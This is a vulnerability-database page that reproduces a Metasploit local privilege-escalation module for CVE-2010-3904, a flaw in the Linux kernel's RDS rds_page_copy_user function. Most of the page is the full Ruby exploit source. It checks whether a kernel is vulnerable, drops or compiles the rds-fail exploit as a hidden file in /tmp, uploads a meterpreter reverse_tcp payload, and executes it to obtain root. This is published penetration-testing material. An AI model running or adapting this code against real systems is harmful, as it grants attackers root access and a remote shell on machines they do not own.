Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Reliable Datagram Sockets (RDS) rds_page_copy_user Privilege Escalation

🗓️ 18 Dec 2019 20:05:19Reported by Dan Rosenberg, bcoles <[email protected]>Type 
metasploit
 metasploit🔗 www.rapid7.com👁 101 Views

This module exploits a vulnerability in the `rds_page_copy_user` function in `net/rds/page.c` (RDS) in Linux kernel versions 2.6.30 to 2.6.36-rc8 to execute code as root (CVE-2010-3904). It has been successfully tested on Fedora 13 (i686) kernel version 2.6.33.3-85.fc13.i686.PAE and Ubuntu 10.04 (x86_64) with kernel version 2.6.32-21-generic

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Linux RDS Protocol Local Privilege Escalation
20 Oct 201000:00
zdt
0day.today		Reliable Datagram Sockets (RDS) Privilege Escalation Exploit
19 May 201800:00
zdt
0day.today		Linux 2.6.30 < 2.6.36-rc8 - Reliable Datagram Sockets (RDS) Privilege Escalation Exploit
21 May 201800:00
zdt
0day.today		vReliable Datagram Sockets (RDS) rds_page_copy_user Privilege Escalation Exploit
24 Dec 201900:00
zdt
ALT Linux		Security fix for the ALT Linux 6 package kernel-image-hpc-skif version 2.6.32-alt24
20 Oct 201000:00
altlinux
ATTACKERKB		CVE-2010-3904
6 Dec 201000:00
attackerkb
Tenable Nessus		CentOS 5 : kernel (CESA-2010:0792)
24 Nov 201000:00
nessus
Tenable Nessus		Fedora 14 : kernel-2.6.35.6-48.fc14 (2010-16826)
29 Oct 201000:00
nessus
Tenable Nessus		MiracleLinux 3 : kernel-2.6.18-194.8.AXS3 (AXSA:2010-492:17)
14 Jan 202600:00
nessus
Tenable Nessus		Oracle Linux 5 : kernel (ELSA-2010-0792)
12 Jul 201300:00
nessus
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = GreatRanking

  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::System
  include Msf::Post::Linux::Kernel
  include Msf::Post::Linux::Compile
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
  include Msf::Module::Deprecated
  prepend Msf::Exploit::Remote::AutoCheck

  moved_from 'exploit/linux/local/rds_priv_esc'

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Reliable Datagram Sockets (RDS) rds_page_copy_user Privilege Escalation',
      'Description'    => %q{
        This module exploits a vulnerability in the `rds_page_copy_user` function
        in `net/rds/page.c` (RDS) in Linux kernel versions 2.6.30 to 2.6.36-rc8
        to execute code as root (CVE-2010-3904).

        This module has been tested successfully on:

        Fedora 13 (i686) kernel version 2.6.33.3-85.fc13.i686.PAE; and
        Ubuntu 10.04 (x86_64) with kernel version 2.6.32-21-generic.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Dan Rosenberg', # Discovery and C exploit
          'bcoles'         # Metasploit
        ],
      'DisclosureDate' => '2010-10-20',
      'Platform'       => [ 'linux' ],
      'Arch'           => [ ARCH_X86, ARCH_X64 ],
      'SessionTypes'   => [ 'shell', 'meterpreter' ],
      'Targets'        => [[ 'Auto', {} ]],
      'Privileged'     => true,
      'References'     =>
        [
          [ 'EDB', '15285' ],
          [ 'CVE', '2010-3904' ],
          [ 'BID', '44219' ],
          [ 'URL', 'https://securitytracker.com/id?1024613' ],
          [ 'URL', 'https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=799c10559d60f159ab2232203f222f18fa3c4a5f' ],
          [ 'URL', 'http://vulnfactory.org/exploits/rds-fail.c' ],
          [ 'URL', 'http://web.archive.org/web/20101020044047/http://www.vsecurity.com/resources/advisory/20101019-1/' ],
          [ 'URL', 'http://web.archive.org/web/20101020044048/http://www.vsecurity.com/download/tools/linux-rds-exploit.c' ],
        ],
      'DefaultOptions' =>
        {
          'PAYLOAD'     => 'linux/x86/meterpreter/reverse_tcp',
          'WfsDelay'    => 10,
          'PrependFork' => true
        },
      'Notes'          =>
        {
          'AKA'         => ['rds-fail.c'],
          'Reliability' => [ UNRELIABLE_SESSION ],
          'Stability'   => [ CRASH_SAFE ],
          'SideEffects' => [ ARTIFACTS_ON_DISK ]
        },
      'DefaultTarget'  => 0))
    register_advanced_options [
      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
    ]
  end

  def base_dir
    datastore['WritableDir'].to_s
  end

  def modules_disabled?
    modules_disabled = cmd_exec('cat /proc/sys/kernel/modules_disabled').to_s.strip
    (modules_disabled.eql?('1') || modules_disabled.eql?('2'))
  end

  def upload(path, data)
    print_status "Writing '#{path}' (#{data.size} bytes) ..."
    rm_f path
    write_file path, data
    register_file_for_cleanup path
  end

  def check
    version = kernel_release
    unless Rex::Version.new(version.split('-').first) >= Rex::Version.new('2.6.30') &&
           Rex::Version.new(version.split('-').first) < Rex::Version.new('2.6.37')
      return CheckCode::Safe("Linux kernel version #{version} is not vulnerable")
    end
    vprint_good "Linux kernel version #{version} appears to be vulnerable"

    unless cmd_exec('/sbin/modinfo rds').to_s.include? 'Reliable Datagram Sockets'
      return CheckCode::Safe('RDS kernel module is not available')
    end
    vprint_good 'RDS kernel module is available'

    if modules_disabled?
      unless cmd_exec('/sbin/lsmod').to_s.include? 'rds'
        return CheckCode::Safe('RDS kernel module is not loadable')
      end
    end
    vprint_good 'RDS kernel module is loadable'

    CheckCode::Appears
  end

  def exploit
    if !datastore['ForceExploit'] && is_root?
      fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.')
    end

    unless writable? base_dir
      fail_with Failure::BadConfig, "#{base_dir} is not writable"
    end

    executable_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"

    if live_compile?
      vprint_status 'Live compiling exploit on system...'
      upload_and_compile executable_path, exploit_data('cve-2010-3904', 'rds-fail.c')
    else
      vprint_status 'Dropping pre-compiled exploit on system...'
      arch = kernel_hardware
      case arch
      when /amd64|ia64|x86_64|x64/i
        upload_and_chmodx executable_path, exploit_data('cve-2010-3904', 'rds-fail.x64')
      when /x86|i[3456]86/
        upload_and_chmodx executable_path, exploit_data('cve-2010-3904', 'rds-fail.x86')
      else
        fail_with Failure::NoTarget, "No pre-compiled binaries are available for system architecture: #{arch}"
      end
    end

    payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"
    upload_and_chmodx payload_path, generate_payload_exe

    print_status 'Launching exploit...'
    output = cmd_exec "#{executable_path} #{payload_path}"
    output.each_line { |line| vprint_status line.chomp }
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
02 Feb 2023 07:17Current
7.8High risk
Vulners AI Score7.8
CVSS 27.2
CVSS 3.17.8
EPSS0.11217
linux kernelrdsprivilege escalationcve-2010-3904fedora 13ubuntu 10.04
101